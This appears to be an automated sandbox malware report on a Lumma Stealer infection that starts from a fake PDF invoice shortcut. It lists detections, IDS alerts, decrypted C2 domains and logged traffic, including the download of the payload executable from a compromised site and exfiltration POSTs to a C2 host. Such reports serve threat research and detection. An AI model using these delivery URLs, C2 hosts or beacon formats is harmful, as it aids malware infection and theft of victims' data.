                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeReversingLabs: Detection: 30%
                      Multi AV Scanner detection for submitted file
                      Source: Rechnung736258.pdf.lnkReversingLabs: Detection: 15%
                      Source: Rechnung736258.pdf.lnkVirustotal: Detection: 24%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\umffwoglbibJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: rapeflowwj.lat
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: crosshuaht.lat
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: sustainskelet.lat
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: aspecteirs.lat
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: energyaffai.lat
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: necklacebudi.lat
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: discokeyus.lat
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: grannyejh.lat
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: securesways.click
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: - Screen Resoluton:
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: - Physical Installed Memory:
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: Workgroup: -
                      Source: 00000015.00000002.2840704537.00000000009E0000.00000002.00000001.01000000.00000000.sdmpString decryptor: AB15g1--
                      Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.5:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49803 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49815 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49821 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49832 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49838 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49849 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49871 version: TLS 1.2
                      Source: Binary string: explorer.pdbUGP source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000003.2666686122.000001C393781000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666568838.000001C3977BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672249767.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665725612.000001C397818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665256230.000001C397868000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2673015925.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667173351.000001C397822000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682666558.000001C397750000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2679787349.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666496000.000001C397800000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667721804.000001C397778000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667474568.000001C393773000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665913555.000001C39376B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666444250.000001C397820000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: inetmib1.pdbGCTL source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840805790.00000000009F6000.00000008.00000001.01000000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: iScrPaint.exe, 00000010.00000002.2299837810.0000000008C1C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2303494720.0000000008F70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563431937.0000000004BCD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563913861.0000000005030000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842076242.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842264902.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: inetmib1.pdb source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840805790.00000000009F6000.00000008.00000001.01000000.00000000.sdmp
                      Source: Binary string: c:\Qt\WebUI2\Release\WebUI.pdb source: TCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F4E000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B906000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr
                      Source: Binary string: wntdll.pdb source: iScrPaint.exe, 00000010.00000002.2299837810.0000000008C1C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2303494720.0000000008F70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563431937.0000000004BCD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563913861.0000000005030000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842076242.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842264902.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000003.2672249767.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665725612.000001C397818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2673015925.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667173351.000001C397822000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682666558.000001C397750000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2679787349.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667721804.000001C397778000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667474568.000001C393773000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665913555.000001C39376B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666444250.000001C397820000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: explorer.pdb source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: number of queries: 1001
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,15_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,15_2_00402B79

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49803 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2058308 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (securesways .click) : 192.168.2.5:55295 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49815 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49832 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49838 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49855 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49849 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49821 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2058309 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) : 192.168.2.5:49871 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49803 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49803 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49849 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49815 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49815 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49871 -> 104.21.16.1:443
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.16.1 443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: crosshuaht.lat
                      Source: Malware configuration extractorURLs: aspecteirs.lat
                      Source: Malware configuration extractorURLs: sustainskelet.lat
                      Source: Malware configuration extractorURLs: rapeflowwj.lat
                      Source: Malware configuration extractorURLs: discokeyus.lat
                      Source: Malware configuration extractorURLs: energyaffai.lat
                      Source: Malware configuration extractorURLs: securesways.click
                      Source: Malware configuration extractorURLs: grannyejh.lat
                      Source: Malware configuration extractorURLs: necklacebudi.lat
                      Source: global trafficHTTP traffic detected: GET /new/files/Documents/KlarnaInvoice42611.pdf HTTP/1.1Host: dimitricostruzioni.chConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dimitri/TCUINOVJ.exe HTTP/1.1Host: dimitricostruzioni.ch
                      Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: SUB6GB SUB6GB
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49803 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49815 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49832 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49838 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49855 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49849 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49821 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49871 -> 104.21.16.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 62.182.21.105:443
                      Source: global trafficHTTP traffic detected: GET /documentcomplie HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dimitricostruzioni.chConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: securesways.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: securesways.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WJQPB7ANUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12770Host: securesways.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TIKP9HLMGXUPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15036Host: securesways.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9SYU6HZEH96User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20520Host: securesways.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7UT9CMYTEQ8VRR08WFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: securesways.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LNMEBUH85CDZUNVO0JVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 403646Host: securesways.click
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: securesways.click
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /documentcomplie HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dimitricostruzioni.chConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /new/files/Documents/KlarnaInvoice42611.pdf HTTP/1.1Host: dimitricostruzioni.chConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dimitri/TCUINOVJ.exe HTTP/1.1Host: dimitricostruzioni.ch
                      Source: global trafficDNS traffic detected: DNS query: dimitricostruzioni.ch
                      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                      Source: global trafficDNS traffic detected: DNS query: securesways.click
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: securesways.click
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drString found in binary or memory: http://bugreports.qt-project.org/
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drString found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
                      Source: iScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: explorer.exe, 00000015.00000003.2840015148.0000000003107000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2839435655.00000000030BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: svchost.exe, 00000006.00000002.3283350977.0000020861A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: iScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicer
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                      Source: iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: explorer.exe, 00000015.00000003.2687174165.0000000005F47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
